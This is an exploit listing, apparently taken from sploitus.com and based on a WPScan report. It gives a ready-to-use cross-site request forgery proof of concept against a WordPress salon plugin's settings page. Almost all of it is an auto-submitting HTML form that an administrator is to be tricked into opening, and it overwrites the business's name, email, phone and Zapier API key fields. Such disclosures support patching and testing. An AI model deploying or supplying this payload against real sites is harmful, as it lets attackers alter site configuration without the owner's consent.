Share
## https://sploitus.com/exploit?id=WPEX-ID:1C6812D8-A218-4C15-9E2D-D43F3F3B0E78
Make an admin open a page containing the code:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=salon-settings" method="POST">
<input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=salon-settings">
<!-- These are the text inputs -->
<input type="text" name="salon_settings[gen_name]" value="csrf">
<input type="email" name="salon_settings[gen_email]" value="csrf@csrf.com">
<input type="text" name="salon_settings[gen_phone]" value="csrf">
<input type="text" name="salon_settings[gen_address]" value="">
<!-- File input for gen_logo -->
<input type="file" name="salon_settings[gen_logo]" filename="">
<!-- More inputs -->
<input type="text" name="salon_settings[date_format]" value="default">
<input type="text" name="salon_settings[time_format]" value="default">
<!-- ... Include other input elements here ... -->
<input type="text" name="salon_settings[feedback_email_subject]" value="WPScan Vulnerability Testbench">
<input type="text" name="salon_settings[zapier_site_url]" value="">
<input type="text" name="salon_settings[zapier_api_key]" value="">
<input type="submit" value="Submit">
<input type="submit" name="reset" value="Reset Settings">
</form>
</body>
```